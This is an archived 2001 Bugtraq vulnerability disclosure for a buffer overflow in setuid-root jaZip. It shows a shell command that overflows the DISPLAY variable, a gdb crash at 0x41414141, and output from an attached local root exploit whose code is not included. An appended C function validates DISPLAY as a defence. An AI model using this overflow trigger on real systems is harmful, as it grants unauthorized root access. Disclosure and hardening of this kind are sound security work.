Bugtraq mailing list archives

Vulnerability in jaZip.
From: teleh0r <teleh0r () DOGLOVER COM>
Date: Sun, 14 Jan 2001 17:05:48 +0000

Dear Bugtraq,

jaZip is a program for managing an Iomega Zip or Jaz drive.
It is often installed setuid root - and because of a buffer
overflow it is possible for regular users to become root.

Please excuse me if this was known. Please note that I cannot
guarantee that this information is correct.

Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/RPMS/jaZip-0.32-2.i386.rpm

  [root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
  [root@localhost /root]# gdb /usr/X11R6/bin/jazip
  GNU gdb 19991004
  Copyright 1998 Free Software Foundation, Inc.
  (gdb) r
  Starting program: /usr/X11R6/bin/jazip

  Program received signal SIGSEGV, Segmentation fault.
  0x41414141 in ?? ()
  ----
  [teleh0r@localhost teleh0r]$ rpm -q jaZip
  jaZip-0.32-2
  [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
  Address: 0xbffff7ac
  bash#

Exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
                -- Elbert Hubbard

Attachment: jazip-exploit.pl
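
Added example, not part of the original post and not jaZip's code: the gdb session above shows an over-long DISPLAY value overwriting the return address of a setuid-root program, so this C function checks the variable's length and syntax before copying it. The name copy_display, the 256-byte cap and the strcpy pattern quoted in the comment are assumptions; the post does not show where in jaZip the copy happens.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DISPLAY_MAX 256 /* assumed cap, not a value taken from jaZip */

/* Assumed unsafe pattern (jaZip's source is not in the post):
 *     char buf[256]; strcpy(buf, getenv("DISPLAY"));
 * A setuid-root binary runs with an environment chosen by the caller,
 * so length and syntax are checked before anything is copied.
 * Accepts [host]:display[.screen]; returns 0 on success, -1 otherwise. */
int copy_display(const char *value, char *dst, size_t dstlen)
{
    if (value == NULL || dst == NULL || dstlen == 0)
        return -1;
    size_t len = 0;
    while (len < dstlen && value[len] != '\0')
        len++;
    if (len == dstlen) return -1;          /* no room for the terminator */
    const char *colon = strrchr(value, ':');
    if (colon == NULL) return -1;
    for (const char *h = value; h < colon; h++)   /* host part */
        if (!isalnum((unsigned char)*h) && strchr(".-_:/[]", *h) == NULL)
            return -1;
    const char *p = colon + 1;                    /* display[.screen] */
    if (!isdigit((unsigned char)*p)) return -1;
    while (isdigit((unsigned char)*p)) p++;
    if (*p == '.') {
        p++;
        if (!isdigit((unsigned char)*p)) return -1;
        while (isdigit((unsigned char)*p)) p++;
    }
    if (*p != '\0') return -1;             /* trailing bytes after the number */
    memcpy(dst, value, len + 1);           /* len + 1 <= dstlen is guaranteed */
    return 0;
}

int main(void)
{
    char display[DISPLAY_MAX];
    if (copy_display(getenv("DISPLAY"), display, sizeof display) != 0) {
        fputs("refusing DISPLAY: missing, too long or malformed\n", stderr);
        return 1;
    }
    printf("using display %s\n", display);
    return 0;
}
```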